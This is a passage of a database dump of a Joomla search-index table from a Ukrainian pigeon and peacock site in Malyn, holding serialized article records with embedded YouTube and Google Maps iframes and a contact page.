User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:42:\"/8-novini-2/2544-vechirne-nebo-nad-malinom\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2544\";s:5:\"route\";s:83:\"index.php?option=com_content&view=article&id=2544:vechirne-nebo-nad-malinom&catid=8\";s:5:\"title\";s:45:\"Вечірнє небо над Малином\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2022-07-24 06:44:53\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2022-07-24 06:44:53\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4954,'index.php?option=com_content&view=article&id=2545','index.php?option=com_content&view=article&id=2545:pora-na-snidanok&catid=128','Пора на сніданок',' ','2022-07-24 09:41:01','fc598365ed744ab7f8393fa6e66cacda',1,1,1,'*','2022-07-24 06:51:54','0000-00-00 00:00:00','2022-07-24 06:51:54','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2545\";s:5:\"alias\";s:16:\"pora-na-snidanok\";s:7:\"summary\";s:325:\"<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/WRgJpiljAAw\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"128\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2022-07-24 06:51:54\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:29:\"Павліни (павичі)\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:21:\"2545:pora-na-snidanok\";s:7:\"catslug\";s:19:\"128:pavliny-pavychi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:45:\"/holuby/pavliny-pavychi/2545-pora-na-snidanok\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:29:\"Павліни (павичі)\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:29:\"Павліни (павичі)\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2545\";s:5:\"route\";s:76:\"index.php?option=com_content&view=article&id=2545:pora-na-snidanok&catid=128\";s:5:\"title\";s:30:\"Пора на сніданок\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2022-07-24 06:51:54\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2022-07-24 06:51:54\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4955,'index.php?option=com_content&view=article&id=2455','index.php?option=com_content&view=article&id=2455:380508320922&catid=129','контактна інформація',' Житомирська область, м.Малин дзвоніть: +380508320922 Telegram: 0508320922 ','2022-07-24 09:43:00','52f5f1f39b43860deb07f7823294042f',1,1,1,'*','2020-08-30 16:58:09','0000-00-00 00:00:00','2020-08-30 16:58:09','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2455\";s:5:\"alias\";s:12:\"380508320922\";s:7:\"summary\";s:306:\"<p><span style=\"font-size: 16px;\"><strong>Житомирська область, м.Малин</strong></span></p><p><span style=\"font-size: 16px;\"><strong>дзвоніть:&nbsp; +380508320922</strong></span></p><p><br></p><p><span style=\"font-size: 16px;\"><strong>Telegram: 0508320922</strong></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"129\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2022-07-24 06:53:53\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"8\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:16:\"Контакти\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:17:\"2455:380508320922\";s:7:\"catslug\";s:16:\"129:rizni-porady\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:31:\"/rizni-porady/2455-380508320922\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:16:\"Контакти\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:16:\"Контакти\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2455\";s:5:\"route\";s:72:\"index.php?option=com_content&view=article&id=2455:380508320922&catid=129\";s:5:\"title\";s:39:\"контактна інформація\";s:11:\"description\";s:107:\" Житомирська область, м.Малин дзвоніть: +380508320922 Telegram: 0508320922 \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-08-30 16:58:09\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-08-30 16:58:09\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4956,'index.php?option=com_content&view=article&id=2543','index.php?option=com_content&view=article&id=2543:bezpechne-misto-malin&catid=8','Безпечне місто Малин',' ','2022-08-12 17:47:33','729568fe74134ac9be5d993a4426488b',1,0,1,'*','2022-01-31 15:06:55','0000-00-00 00:00:00','2022-01-31 15:06:55','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2543\";s:5:\"alias\";s:21:\"bezpechne-misto-malin\";s:7:\"summary\";s:138:\"<iframe height=\"480\" src=\"https://www.google.com/maps/d/embed?mid=1FjGG3vOsT9Yn4OkQUVhqRfZ1AguRkk0I&amp;ehbc=2E312F\" width=\"640\"></iframe>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2022-01-31 15:06:55\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"1\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:26:\"2543:bezpechne-misto-malin\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:38:\"/8-novini-2/2543-bezpechne-misto-malin\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2543\";s:5:\"route\";s:79:\"index.php?option=com_content&view=article&id=2543:bezpechne-misto-malin&catid=8\";s:5:\"title\";s:38:\"Безпечне місто Малин\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:0;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2022-01-31 15:06:55\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2022-01-31 15:06:55\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4957,'index.php?option=com_content&view=article&id=2546','index.php?option=com_content&view=article&id=2546:z-dnem-sobornosti-ukrajini&catid=134','З Днем Соборності України!',' ','2023-01-22 11:41:40','a408dd63b2a1c8c457d568fff40b59c1',1,1,1,'*','2023-01-22 09:43:22','0000-00-00 00:00:00','2023-01-22 09:43:22','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2546\";s:5:\"alias\";s:26:\"z-dnem-sobornosti-ukrajini\";s:7:\"summary\";s:336:\"<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/zc85mnU49vM\" title=\"YouTube video player\" 